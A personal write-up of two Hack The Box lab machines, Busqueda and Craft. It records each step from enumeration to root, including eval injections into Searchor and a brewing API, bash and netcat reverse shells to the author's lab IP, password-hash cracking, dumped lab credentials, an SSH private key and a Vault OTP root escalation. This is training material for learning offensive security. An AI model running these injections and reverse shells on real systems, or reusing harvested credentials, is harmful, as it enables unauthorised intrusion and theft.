As I felt that I have fallen into a small rabbit hole with it, I decided to scope out of it and look for some public exploits. Wappalyzer found a lot of different components of the website so I went through some of them and Flask itself too. I found some GitHub repos taking about an exploit (Arbitrary CMD Injection) for Searchor 2.4.0 and 2.4.2, this could be what I’m looking for.

Reading up on the vulnerability, it comes from a vulnerable eval() function which is really funny as I just did the Craft machine which also took advantage of this insecure function!

So, I cloned this exploit to my local machine, run nc -lnvp 1337 and followed the syntax mentioned in the repository and in the script contents and got shell on the target host. What is actually pretty interesting about this shell is that it uses python as an execution method evil_cmd="',__import__('os').system('echo ${rev_shell_b64}|base64 -d|bash -i')) # junky comment" for a payload which is actually in encoded bash rev_shell_b64=$(echo -ne "bash -c 'bash -i >& /dev/tcp/$2/${port} 0>&1'" | base64).

svc

On the target machine I was spawned in as a svc user. I looked manually for some interesting information, found the user flag but nothing at /home gave me way further although there was a .git file on it. I went back into the home directory of the user at /var/www/app and looked around for some other possible priv-esc vectors. In those files I found a .git folder which holds an initial repo commit data. In this data, I found a config file which hold a url that links the local repository with a remote one. This link hold embedded credentials for the user cody.

cody:jh1usoih2bkjaspwe92

I suspect that similar simple security vectors finally made Microsoft enforce a token authentication within GitHub. Besides the credentials we can also see another subdomain gitea.searcher.htb. I will add it into /etc/hosts just in case.

Privilege Escalation

Cody

Let’s try to authenticate into SSH with the new credentials and hope that the user reused their creds. Sadly they didn’t work on SSH but I accessed gitea.searcher.htb via browser and authenticated as cody - it went through.

Gitea seems to be a self-hosted git platform, similar to gogs - which is another similarity to Craft On it, I found a repository where cody and Administrator worked on the searcher webapp. I reviewed the code thoroughly, logic that is used to POST the search request looks quite vulnerable at the first glace.

if engine in Engine.__members__.keys():
	arg_list = ['searchor', 'search', engine, query]
	r = subprocess.run(arg_list, capture_output=True)
	url = r.stdout.strip().decode()

The script uses subprocesses library in Python which is generally used to call and execute other tools on the host like nc to make a script run a listener. This script takes user’s input (“engine” and “query”) and uses it to run the searchor, then returns its output (or redirects to it) without validating how that tool handles the input. The vulnerable part here is that there are no filters for a user, it supplies user input directly into the function’s logic.

I tried to test some payloads but none of them worked, unfortunately it looks like It won’t work. subprocess.run passes the input as a literal argument no matter what I put in there and not matter how I try to escape it. My payloads won’t get executed unless searchor itself would somehow mishandle them internally but that didn’t happen.

I decided to scope out from the gitea and try to do some more priv-esc enumeration before I ran any automated tools. Running sudo -l -S I got some information.

Matching Defaults entries for svc on busqueda:
 env_reset, mail_badpass,
 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
 use_pty

User svc may run the following commands on busqueda:
 (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

It looks like my correct user has full root rights over the /opt/scripts/system-checkup.py python scripts.

sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py -h
<SNIP>
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)
 docker-ps : List running docker containers
 docker-inspect : Inpect a certain docker container
 full-checkup : Run a full system checkup

Reading up on the help page, I can see that I can enumerate running containers.

svc@busqueda:/$ sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
<in/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
960873171e2e gitea/gitea:latest "/usr/bin/entrypoint…" 3 years ago Up 24 hours 127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp gitea
f84a6b33fb5a mysql:8 "docker-entrypoint.s…" 3 years ago Up 24 hours 127.0.0.1:3306->3306/tcp, 33060/tcp mysql_db

Seeing the mysql_db container I looked up what data can be actually inspected, “.Config.Env” is a metadata field which gives basic configuration information and present variables of the container. I tried to run it like that sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect .Config.Env mysql_db but it didn’t work. I tried sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect ".Config.Env" mysql_db but it also didn’t work. Finally I found that in Go language, metadata is also parsed with double {’s so I tried with them sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect {{.Config.Env}} mysql_db and it worked.

Inside, I actually found some credentials - “MYSQL_ROOT_PASSWORD”, “MYSQL_USER” and “MYSQL_PASSWORD”.

svc@busqueda:/$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect "{{.Config.Env}}" mysql_db
<heckup.py docker-inspect "{{.Config.Env}}" mysql_db
[MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF MYSQL_USER=gitea MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh MYSQL_DATABASE=gitea PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin GOSU_VERSION=1.14 MYSQL_MAJOR=8.0 MYSQL_VERSION=8.0.31-1.el8 MYSQL_SHELL_VERSION=8.0.31-1.el8]

I assume that this is how the credentials should be related.

gitea:yuiu1hoiu4i5ho1uh
root:jI86kGUuj87guWr3RyF

I tried to connect to the database with this command, but it didn’t work mysql -u gitea -pyuiu1hoiu4i5ho1uh -h 127.0.0.1 -P 3306 which is unusual. Then I tried mysql -u gitea -p -h 127.0.0.1 -P 3306 to no avail.

I gave up on connecting to the mysql directly, this could be an issue with my shell and spawning another tool locally, so I just run commands one-by-one like so:

svc@busqueda:/var/www/app$ mysql -u gitea -pyuiu1hoiu4i5ho1uh -h 127.0.0.1 -P 3306 -e "SHOW DATABASES;"
<SNIP>
Database
gitea
information_schema
performance_schema

Then I looked at the tables:

mysql -u gitea -pyuiu1hoiu4i5ho1uh -h 127.0.0.1 -P 3306 -e "USE gitea; SHOW TABLES;"
<SNIP>
watch
webauthn_credential
webhook

And enumerated user data:

mysql -u gitea -pyuiu1hoiu4i5ho1uh -h 127.0.0.1 -P 3306 -e "USE gitea; SELECT * FROM user";

The information came out really scuffed, so I spent some time formatting it to be actually readable.

id	lower_name	name	full_name	email	keep_email_private	email_notifications_preference	passwd	passwd_hash_algo	must_change_password	login_type	login_source	login_nametype	location	website	rands	salt	language	description	created_unix	updated_unix	last_login_unix	last_repo_visibility	max_repo_creation	is_active	is_admin	is_restricted	allow_git_hook	allow_import_local	allow_create_organization	prohibit_login	avatar	avatar_email	use_custom_avatar	num_followers	num_following	num_stars	num_reposnum_teams	num_members	visibility	repo_admin_change_team_access	diff_view_style	theme	keep_activity_private
1	administrator	administrator		administrator@gitea.searcher.htb	0	enabled	ba598d99c2202491d36ecf13d5c28b74e2738b07286edc7388a2fc870196f6c4da6565ad9ff68b1d28a31eeedb1554b5dcc2	pbkdf2	0	0	0		0			44748ed806accc9d96bf9f495979b742	a378d3f64143b284f104c926b8b49dfb	en-US		1672857920	1680531979	1673083022	1-1	1	1	0	0	0	1	0		administrator@gitea.searcher.htb	0	0	0	0	1	0	0	0	0		auto	0
2	cody	cody		cody@gitea.searcher.htb	0	enabled	b1f895e8efe070e184e5539bc5d93b362b246db67f3a2b6992f37888cb778e844c0017da8fe89dd784be35da9a337609e82e	pbkdf2	0	0	0		0304b5a2ce88b6d989ea5fae74cc6b3f3	d1db0a75a18e50de754be2aafcad5533	en-US		1672858006	1680532283	1680532243	1	-1	1	0	0	0	0	1	0cody@gitea.searcher.htb	0	0	0	0	1	0	0	0	0		auto	0

Here’s the data in a table:

ID	Name	Email	Password	Algorithm	Salt
1	administrator	administrator@gitea.searcher.htb	ba598d99c2202491d36ecf13d5c28b74e2738b07286edc7388a2fc870196f6c4da6565ad9ff68b1d28a31eeedb1554b5dcc2	pbkdf2	a378d3f64143b284f104c926b8b49dfb
2	cody	cody@gitea.searcher.htb	b1f895e8efe070e184e5539bc5d93b362b246db67f3a2b6992f37888cb778e844c0017da8fe89dd784be35da9a337609e82e	pbkdf2	d1db0a75a18e50de754be2aafcad5533

What I see here are PBKDF2-HMAC-SHA256 password hashes. I have the password itself, algorythm mentioned and salt but I do not know the amount of the hashing iterations the passwords went through. This information is important to be able to actually crack the password. From my googling it seems like 50000 iterations is a standard. hashcat -m 10900 'sha256:50000:a378d3f64143b284f104c926b8b49dfb:ba598d99c2202491d36ecf13d5c28b74e2738b07286edc7388a2fc870196f6c4da6565ad9ff68b1d28a31eeedb1554b5dcc2' wordlist.txt I ran this for a long time but nothing came out and it took too long so I pivoted to other possible vectors.

I thought of xp_cmdshell but it’s only on MSSQL and not on MySQLs. I tried reading and writing files but It didn’t work. I checked it with mysql -u root -pjI86kGUuj87guWr3RyF -h 127.0.0.1 -P 3306 -e "show variables like 'secure_file_priv'"; and it looks that mysql is restricted to only read and write files in /var/lib/mysql-files/.

Administrator

Quite disappointingly I ran out of ideas and tried to authenticate with the credentials I have to SSH and later to Gitea. Turns out that Administrator:yuiu1hoiu4i5ho1uh is a valid combo. This is a bit weird as the “root” password for the DB is different. I guess this just shows that it’s important to check every possible combination of acquired credentials.

I was able to access administrators gitea and enumerate the scripts inside, the one inside is system-checkup.py. From the code I learned that the scripts looks for a relative path when running full-checkup and want to run ./full-checkup.py.

I can create a bash reverse shell and rename it to full-checkup.py so that the script reads and executes my shell in process elevating my privileges. First I create the payload with echo -N "bash -c 'bash -i >& /dev/tcp/10.10.15.189/1338 0>&1;'" > full-checkup.sh change permissions so that it can be executed chmod +x full-checkup.sh and lastly I start a listener with nc -lnvp 1338.

Then when I run sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup and get a shell as root.

Closing Thoughts

Busqueda introduces a solid code review exercise, working with repositories and custom scripts. It’s heavy on careful code enumeration and gradual pivoting granting further access. Very fun and insightful!

Craft

EmilPawlak@protonmail.com (Emil Pawlak) — 04.04.2026

Enumeration

nmap

I started my nmap scan with sudo nmap -sC -sV -O -Pn 10.129.21.109; sleep 5; sudo nmap -p- -Pn 10.129.21.109; sleep 5; sudo nmap -sU -Pn 10.129.21.109

nmap scan results

Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-02 17:39 CEST
Nmap scan report for 10.129.21.109
Host is up (0.028s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
| 2048 bd:e7:6c:22:81:7a:db:3e:c0:f0:73:1d:f3:af:77:65 (RSA)
| 256 82:b5:f9:d1:95:3b:6d:80:0f:35:91:86:2d:b3:d7:66 (ECDSA)
|_ 256 28:3b:26:18:ec:df:b3:36:85:9c:27:54:8d:8c:e1:33 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/2%OT=22%CT=1%CU=31105%PV=Y%DS=2%DC=I%G=Y%TM=69CE8DD5
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SEQ(
OS:SP=103%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=104%GCD=1%ISR=108%TI=Z%C
OS:I=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GC
OS:D=2%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M4E2ST11NW7%O2=M4E2ST11NW7%O3=M4E
OS:2NNT11NW7%O4=M4E2ST11NW7%O5=M4E2ST11NW7%O6=M4E2ST11)WIN(W1=FE88%W2=FE88%
OS:W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M4E2NNSNW7%CC
OS:=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40
OS:%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-02 17:40 CEST
Nmap scan report for 10.129.21.109
Host is up (0.029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
443/tcp open https
6022/tcp open x11

Nmap done: 1 IP address (1 host up) scanned in 14.11 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-02 17:40 CEST
Nmap scan report for 10.129.21.109
Host is up (0.029s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc

Nmap done: 1 IP address (1 host up) scanned in 1008.69 seconds

Port - 6022

I accessed the port 6022 and found this info in a simple clear text

SSH-2.0-Go
��ü)¹)“3bU=²¤���Œcurve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1���ssh-rsa���Maes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128���Maes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128���Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96���Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96���none���none�������������bq¯

Speed guide shows that port 6022 belong to the x11 service which is an X Window System. “The X Window System is a windowing system for bitmap displays, common on Unix-like operating systems.” ~ Wikipedia Here is a good read on the basic concept of x11.

craft.htb

The website on 443 at first didn’t work for me but now I can view it. Front page suggest that we will work with some API calls. both menu options use two new subdomains “api.craft.htb” and “gogs.craft.htb”. I will add them to my /etc/hosts and run ffuf to look for any other subdomains and to enumerate directories. ffuf -u https://craft.htb/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 291 ffuf -u https://craft.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.craft.htb" -fs 3779

I also didn’t find any comments on the main website, it does use nginx 1.15.8.

api subdomain hosts different api calls. Two interesting one are authentication check to check validity of an authorization token and the authentication login to create the said token. gogs is a local git repo tools. I found some users related to it

administrator
ebachman Erlich Bachman
dinesh Dinesh Chugtai
gilfoyle Bertram Gilfoyle

I suspect there will be some API keys, tokens or creds in the repository by accident. I found a discussion about adding bogus ABV values; it was partially patched but still seems insecure, making it a potential attack vector for exploring API behavior.

Foothold

I this issue we can see this command holding a JWT token (JSON Web Token). curl -H 'X-Craft-API-Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidXNlciIsImV4cCI6MTU0OTM4NTI0Mn0.-wW1aJkLQDOE-GP5pQd3z_BJTe2Uo0jJ_mQ238P5Dqw' -H "Content-Type: application/json" -k -X POST https://api.craft.htb/api/brew/ --data '{"name":"bullshit","brewer":"bullshit", "style": "bullshit", "abv": "15.0")}'

These tokens have three parts:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 - Header
eyJ1c2VyIjoidXNlciIsImV4cCI6MTU0OTM4NTI0Mn0 - Payload
wW1aJkLQDOE-GP5pQd3z_BJTe2Uo0jJ_mQ238P5Dqw - Signature

Depending on the cryptographic in place I could crack it, but I’d need to look into that more. Let’s check other information that we can find.

Later on that issue one of the users shows a commit with this patch which another developer find bad

+ # make sure the ABV value is sane.
+ if eval('%s > 1' % request.json['abv']):
+ return "ABV must be a decimal value less than 1.0", 400
+ else:
+ create_brew(request.json)
+ return None, 201

This is Python script, it checks if the user provided “abv” input is higher than 1, and depending on result of this check creates given outcomes. There are two interesting parts of the script for us. It uses eval() which is a known dangerous function in a number of different programming languages.It’s dangerous because it runs string data as an executable instruction. The second interesting part is that request.json['abv']) plainly outputs unfiltered user output into the command. Both of these weakness are bad on their own as one gives a possibility of command execution and another of command injection. Together they are a really great foothold opportunity.

parrot@parrot (~): curl -H 'X-Craft-API-Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidXNlciIsImV4cCI6MTU0OTM4NTI0Mn0.-wW1aJkLQDOE-GP5pQd3z_BJTe2Uo0jJ_mQ238P5Dqw' -H "Content-Type: application/json" -k -X POST https://api.craft.htb/api/brew/ --data '{"name":"a","brewer":"a","style":"a","abv":"__import__(\"os\").system(\"id\")"}' 
{"message": "Invalid token or no token found."}

To try and attempt to exploit this vulnerability I’d have to have a valid token, meaning I’d have to find a not expired one in the wild or generate one which requires credentials.

I looked through the issues, repository and finally the commits and found some accidentally pushed credentials - dinesh:4aUh0A8PbVJxgd.

I used them to create my token request at the api dashboard.

TOKEN=$(curl -s -k -X GET "https://dinesh:4aUh0A8PbVJxgd@api.craft.htb/api/auth/login" -H "accept: application/json" | jq -r '.token')

Now when I try to exploit the vulnerable code my token goes through and I can test my injection payloads.

curl -H 'X-Craft-API-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZGluZXNoIiwiZXhwIjoxNzc1MjA2MjQzfQ.1MRivtSjMK8IJKagIWHZRtp7M_632Rhp0vEk84UKYmU' -H "Content-Type: application/json" -k -X POST https://api.craft.htb/api/brew/ --data '{"name":"a","brewer":"a","style":"a","abv":"__import__("os").system("id")"}' 

This works too:

TOKEN=$(curl -s -k -X GET "https://dinesh:4aUh0A8PbVJxgd@api.craft.htb/api/auth/login" -H "accept: application/json" | jq -r '.token'); \
curl -X POST "https://api.craft.htb/api/brew/" -H "accept: application/json" -H "Content-Type: application/json" -d "{
\"id\": 0,
\"brewer\": \"0xdf\",
\"name\": \"beer\",
\"style\": \"bad\",
\"abv\": \"__import__('os').system('nc 10.10.15.189 1337 -e /bin/sh')\"}" -k -H "X-CRAFT-API-TOKEN: $TOKEN"

And this, finally works!

TOKEN=$(curl -s -k -X GET "https://dinesh:4aUh0A8PbVJxgd@api.craft.htb/api/auth/login" -H "accept: application/json" | jq -r '.token'); \
curl -X POST "https://api.craft.htb/api/brew/" -H "accept: application/json" -H "Content-Type: application/json" -d '{"id":0,"brewer":"0xdf","name":"beer","style":"bad","abv":"__import__(\"os\").system(\"nc 10.10.15.189 1337 -e /bin/sh\")"}' -k -H "X-CRAFT-API-TOKEN: $TOKEN"

I had a surprising amount of problems with quotation marks and escaping them correctly. I spent a lot of time tweaking these commands and breaking down the api logic locally.

For practice and better understanding of working with API, HTTP requests and Python I created a working script that exploits this vulnerability. The only requirements are to add api.craft.htb into the /etc/hosts and python3 to run it - you can view it on my Codeberg.

root

With this behind us we got a limited shell of the 5a3d243127f5 host on which we are root. Looking the root directory we can see the .dockerenv folder hinting that we’re inside of a container. Manual enumeration doesn’t show any interesting vectors besides the webapp files. In them we find dbtest.py which is a file we saw on gogs, it creates a query to a db from the POST data it gets. Database details like the credentials, destination and it’s name are said to be in some settings file. Moving into craft_api folder we can indeed find it. Inside, we can find the database details and a service token.

MYSQL_DATABASE_USER = 'craft'
MYSQL_DATABASE_PASSWORD = 'qLGockJ6G2J75O'
CRAFT_API_SECRET = 'hz66OCkDtv8G6D'

craft

I first tried to use mysql locally - but it isn’t installed - and call it remotely with mysql -u craft -pqLGockJ6G2J75O -h 10.129.22.88 - but this doesn’t work and hangs my shell. This is because the database isn’t local, it’s in fact on the db host which I assume is the Docker daemon. Due to the fact that my shell is connected to a simple web request it’s limited by the timeout time of the web server which is approximately 60 seconds. Due to that limitation, I was thinking how to best access the database. As my shell access was somewhat flimsy I didn’t want to bother setting up a chisel tunnel and work with transferring files - which also ruled out downloading mysql and similar tooling. What I stumbled upon was pymysql which is a python library for working with sql. As the whole box is somehow very Python for me from start until now, I decided to try it out.

With my 60 second window of opportunity I tested my commands and came up with a working one. python -c "import pymysql; c=pymysql.connect(host='db',user='craft',password='qLGockJ6G2J75O',db='craft'); cur=c.cursor(); cur.execute('SHOW TABLES'); print(cur.fetchall())" This command imports pymysql, connects to the database, creates a cursor which is a Python object that channels and sends the SQL queries to the database as well as simply show the queried data. You just need to adjust the query in the cursor and you can fetch any details from the database. Output from the above query showed me that there are two tables brew and user. Of course the latter is more interesting for us, so I ran another query. python -c "import pymysql; c=pymysql.connect(host='db',user='craft',password='qLGockJ6G2J75O',db='craft'); cur=c.cursor(); cur.execute('SELECT * FROM user'); print(cur.fetchall())" Which gave as further credentials:

((1, 'dinesh', '4aUh0A8PbVJxgd'), (4, 'ebachman', 'llJ77D8QFkLPQB'), (5, 'gilfoyle', 'ZEU3N8WNM2rh4T'))

Let’s try to access SSH with them.

gilfoyle

Sadly both on the normal port 22 and on the SSH via Go port 6022 I was unable to use it. There is however a login form on gogs. I found two public keys for the users, likely for authentication to gogs, nothing special, especially without the private keys.
dinesh: SHA256:8Fc2kZiv0Y+kjkh8atKr6brzBiM1DoDIhG6LN1ktPfA
gilfoyle: SHA256:D28DXyVaw0/mPuLBp3mDbS8z6oCRKS1hawJ5gxecFBQ

Digging further into gilfoyle I found that he had a private repository called craft-infra on which we can find his public and private SSH keys, likely to the dc host.

SSH private key

parrot@parrot (~/Desktop/htb/machines/craft): cat id_rsa 
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABDD9Lalqe
qF/F3X76qfIGkIAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDSkCF7NV2Z
F6z8bm8RaFegvW2v58stknmJK9oS54ZdUzH2jgD0bYauVqZ5DiURFxIwOcbVK+jB39uqrS
zU0aDPlyNnUuUZh1Xdd6rcTDE3VU16roO918VJCN+tIEf33pu2VtShZXDrhGxpptcH/tfS
RgV86HoLpQ0sojfGyIn+4sCg2EEXYng2JYxD+C1o4jnBbpiedGuqeDSmpunWA82vwWX4xx
lLNZ/ZNgCQTlvPMgFbxCAdCTyHzyE7KI+0Zj7qFUeRhEgUN7RMmb3JKEnaqptW4tqNYmVw
pmMxHTQYXn5RN49YJQlaFOZtkEndaSeLz2dEA96EpS5OJl0jzUThAAAD0JwMkipfNFbsLQ
B4TyyZ/M/uERDtndIOKO+nTxR1+eQkudpQ/ZVTBgDJb/z3M2uLomCEmnfylc6fGURidrZi
4u+fwUG0Sbp9CWa8fdvU1foSkwPx3oP5YzS4S+m/w8GPCfNQcyCaKMHZVfVsys9+mLJMAq
Rz5HY6owSmyB7BJrRq0h1pywue64taF/FP4sThxknJuAE+8BXDaEgjEZ+5RA5Cp4fLobyZ
3MtOdhGiPxFvnMoWwJLtqmu4hbNvnI0c4m9fcmCO8XJXFYz3o21Jt+FbNtjfnrIwlOLN6K
Uu/17IL1vTlnXpRzPHieS5eEPWFPJmGDQ7eP+gs/PiRofbPPDWhSSLt8BWQ0dzS8jKhGmV
ePeugsx/vjYPt9KVNAN0XQEA4tF8yoijS7M8HAR97UQHX/qjbna2hKiQBgfCCy5GnTSnBU
GfmVxnsgZAyPhWmJJe3pAIy+OCNwQDFo0vQ8kET1I0Q8DNyxEcwi0N2F5FAE0gmUdsO+J5
0CxC7XoOzvtIMRibis/t/jxsck4wLumYkW7Hbzt1W0VHQA2fnI6t7HGeJ2LkQUce/MiY2F
5TA8NFxd+RM2SotncL5mt2DNoB1eQYCYqb+fzD4mPPUEhsqYUzIl8r8XXdc5bpz2wtwPTE
cVARG063kQlbEPaJnUPl8UG2oX9LCLU9ZgaoHVP7k6lmvK2Y9wwRwgRrCrfLREG56OrXS5
elqzID2oz1oP1f+PJxeberaXsDGqAPYtPo4RHS0QAa7oybk6Y/ZcGih0ChrESAex7wRVnf
CuSlT+bniz2Q8YVoWkPKnRHkQmPOVNYqToxIRejM7o3/y9Av91CwLsZu2XAqElTpY4TtZa
hRDQnwuWSyl64tJTTxiycSzFdD7puSUK48FlwNOmzF/eROaSSh5oE4REnFdhZcE4TLpZTB
a7RfsBrGxpp++Gq48o6meLtKsJQQeZlkLdXwj2gOfPtqG2M4gWNzQ4u2awRP5t9AhGJbNg
MIxQ0KLO+nvwAzgxFPSFVYBGcWRR3oH6ZSf+iIzPR4lQw9OsKMLKQilpxC6nSVUPoopU0W
Uhn1zhbr+5w5eWcGXfna3QQe3zEHuF3LA5s0W+Ql3nLDpg0oNxnK7nDj2I6T7/qCzYTZnS
Z3a9/84eLlb+EeQ9tfRhMCfypM7f7fyzH7FpF2ztY+j/1mjCbrWiax1iXjCkyhJuaX5BRW
I2mtcTYb1RbYd9dDe8eE1X+C/7SLRub3qdqt1B0AgyVG/jPZYf/spUKlu91HFktKxTCmHz
6YvpJhnN2SfJC/QftzqZK2MndJrmQ=
-----END OPENSSH PRIVATE KEY-----

When I try to authenticate with ssh -i id_rsa gilfoyle@10.129.22.88 i get a message “Load key “id_rsa”: error in libcrypto”. From what I’ve read this can happen when SSH expects an older private key format called PEM. You can easily know which one is which by looking at the first line: New one: -----BEGIN OPENSSH PRIVATE KEY----- Old one: -----BEGIN RSA PRIVATE KEY-----

Luckily, the key can be formatted easily with ssh-keygen. First let’s make a copy of the original with cp id_rsa id_rsa-original and format the copy with ssh-keygen -p -f id_rsa -m PEM. When I tried to run this, I got another error stating Failed to load key id_rsa: error in libcrypto.

After some digging, I found an article stating that the issue was because the user didn’t include a newline after the closing line of the key. I went back and raw copied the key from the github. I had two new lines at the end, when I pasted it like so, it worked flawlessly.

Enumerating the user they don’t have any low hanging permissions or rights to take advantage on. Interestingly, I’m on the craft.htb host and not db which I suspected was the hostname of the Docker host.

Privilege Escalation

Vault

I looked a bit further and found .vault-token file which contains this token f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9gilfoyle. I looked through the filesystem with find / -iname "*vault*" 2>/dev/null and found these files.

/home/gilfoyle/.vault-token
/var/log/vaultssh.log
/usr/local/bin/vault
/usr/local/bin/vault-ssh-helper
/usr/local/etc/vault-ssh-helper.hcl

I then ran looked through them manually and greped for key words in them but didn’t find anything interesting. I tried to ssh into the port 6022 as maybe that is the vault that is mentioned. The amount of SSH files suggested that but I still can’t authenticate there. There are ssh related files and that the whole box is about web requests I decided to run my directory and subdomain enumerations as I canceled them prematurely at the start of the box. I scanned for some time but nothing new came up.

I looked again through the infra.craft repo and found a folder named vault. as both vault and vault-ssh-helper are in the bin folder I should be able to execute them and see how they work. I can read and list secrets from a vault, the issue is that I don’t know the path to it. I tried to do vault list /ssh/roles/root_otp as I saw this path in secrets.sh - didn’t work and seemed far fetched. There is a way to use ssh to authenticate into a vault, maybe i can use that token I found before in it. This is the info from the help option:

# Info from the `help` option
SSH using the OTP mode (requires sshpass for full automation):
	$ vault ssh -mode=otp -role=my-role user@1.2.3.4

SSH using the CA mode:
	$ vault ssh -mode=ca -role=my-role user@1.2.3.4

SSH using CA mode with host key verification:
	$ vault ssh \
		-mode=ca \
		-role=my-role \
		-host-key-mount-point=host-signer \
		-host-key-hostnames=example.com \
	user@example.com

There are three way to authenticate “one time password” and two “certificate authority” modes. Looking at the token I found it looks more like an OTP authentication.

I reviewed the source code and found these parts interesting:

vault write ssh/roles/root_otp \
 key_type=otp \
 default_user=root \
 cidr_list=0.0.0.0/0

Token: f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9gilfoyle

storage "file" {
	path = "/vault/data"
}
ui = false
listener "tcp" {
	address = "0.0.0.0:8200"
	tls_cert_file = "/vault/pki/vault.craft.htb.crt"
	tls_key_file = "/vault/pki/vault.craft.htb.key"
	tls_min_version = "tls12"

The first command is the most important one - it creates a role root_otp which can request to get OTPs for root and those request can come from any IP. This represents a lazy admin setup and because of this can get a root access simply by requesting it. The token is an OTP that was used by the user, it showed me what it looks like. The last script shows that the vault is located at /vault/data and that it is listening on all interfaces with HTTPS on the 8200 port.

To get the root, I simply ran vault ssh -mode=otp -role=root_otp root@10.129.22.88.

Closing Thoughts

This box was challenging to me, one of the most confusing I worked on. I had little experience until now with working with APIs and creating injections is something I need to practice more. I liked that I challenged myself to write my first working exploit for this box and it helped me to learn and refresh my Python knowledge. Simulation of reading up on a git repo and a really hands on code review was a great learning experience. I never worked with HashiCorp Vault before so this was also interesting - a lot of pivoting as well.

For code review and injections I think is important to try to really concentrate, go down the rabbit hole and really try to understand the logic of the mechanism. Sounds trivial I know, but I feel I could save a lot of time by starting with such hard mindset from the beginning.

PS: I still didn’t figure out what was port 6022 used for, so like ¯\(ツ)/¯